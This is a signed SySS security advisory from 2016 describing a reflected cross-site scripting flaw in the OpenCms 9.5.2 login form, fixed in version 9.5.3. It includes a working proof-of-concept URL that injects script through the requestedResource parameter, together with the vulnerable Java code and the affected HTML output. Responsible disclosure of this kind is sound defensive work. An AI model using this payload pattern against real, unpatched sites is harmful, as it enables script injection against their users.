OpenCms 9.5.2 Cross Site Scripting
Posted on 23 February 2016
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2015-063 Product: OpenCms Official Maintainer: Alkacon Software GmbH Affected Version(s): 9.5.2 Tested Version(s): 9.5.2 Vulnerability Type: Cross-Site Scripting (CWE-79) Risk Level: Medium Solution Status: Fixed Maintainer Notification: 2015-11-27 Solution Date: 2016-01-13 Public Disclosure: CVE Reference: Not yet assigned Author of Advisory: Rainer Boie (SySS GmbH) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: OpenCms is an open source web content management system. Alkacon Software GmbH is the official maintainer and the major contributor for OpenCms (see [1]). ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The SySS GmbH found out that a logged on user with at least workspace access is vulnerable to a reflected cross-site scripting attack using the OpenCms login form. An attacker can use an URL to create the attack as the attack vector is triggered by an HTTP GET request. It is recommended to filter and escape transmitted parameter values. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): Using a fresh installation of OpenCms in version 9.5.2 and generating and logging in with a user with workspace access rights, the following attack vector was used: http://<HOST>:<PORT>/opencms/opencms/system/login/index.html?requestedResource=%2Fsystem%2Fworkplace%2Fcommons%2Fdisplayresource.jsp%3Fresource%3D%252Fsuchergebnis%252Findex.html";alert('XSS');//&__loginform=true The parameter is handled by the function appendWorkplaceOpenerScript in the file CmsLogin.java. The vulnerable code section is: html.append(" var openUri = ""); html.append(link(openResource)); html.append(""; "); html.append(" var workplaceWin = openWorkplace(openUri, ""); The JavaScript code is executed in the web browser as it is included in the following affected part of the HTML response: function doOnload() { var openUri = "/opencms/opencms/system/workplace/commons/displayresource.jsp?resource=%2Fsuchergebnis%2Findex.html";alert('XSS');//"; var workplaceWin = openWorkplace(openUri, "OpenCms1448623274999"); if (window.name != "OpenCms1448623274999") { window.opener = workplaceWin; if (workplaceWin != null) { window.close(); } } } ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: The main maintainer Alkacon Software GmbH published 01/13/2016 version 9.5.3 where the flaw is fixed. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2015-11-27: Vulnerability reported to the official maintainer Alkacon Software GmbH 2015-12-04: Vulnerability reported to the official maintainer Alkacon Software GmbH 2015-12-04: Response from maintainer: The issue is fixed in version 9.5.3 which is planned to be published 01/13/2016. 2016-01-13: Release 9.5.3 published 2016-01-20: Checked and confirmed fix of vulnerability in version 9.5.3 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product Web site for OpenCms http://www.opencms.org [2] SySS Security Advisory SYSS-2015-063 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2015-063.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/news/responsible-disclosure-policy/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Rainer Boie of the SySS GmbH. E-Mail: rainer.boie (at) syss.de Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Rainer_Boie.asc Key fingerprint = E724 9ECC 7E6F 1008 16AB 1A53 5C12 823D 608D 7AE9 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQEcBAEBCgAGBQJWyxBmAAoJEFwSgj1gjXrpapYH/1eKvLsApiVYoAn84Guy2sbn n2LJUORCMkByi2gDCsMij2Y2gnF3cebhsmsos0e6UdGl4f3ztRAnNFI5JLKZ9GjB xfbNZ0kVqaocETTkqpMWNcEpM57E5/2fnsOEdxZjjMA5wg6DGLZYzRAxx/nEWSCn eQGf8BCKLufLp2MAdNfjCKr4zBE8i+ZBF6QYAoG3YItbIXZvH5WLxfcsPtacoj2K LQHW34V9k6OFDmztfmYo42BhhGy1pj7zcZhlQDL+a3iqvDGeGS2F27vnRgbFFBVD 3K6sfQk78Fx4ceKn32ew8knahUl+DrzgaYnR/JZqGdjOSg871j2jiPt8Esqq2lc= =bRHg -----END PGP SIGNATURE-----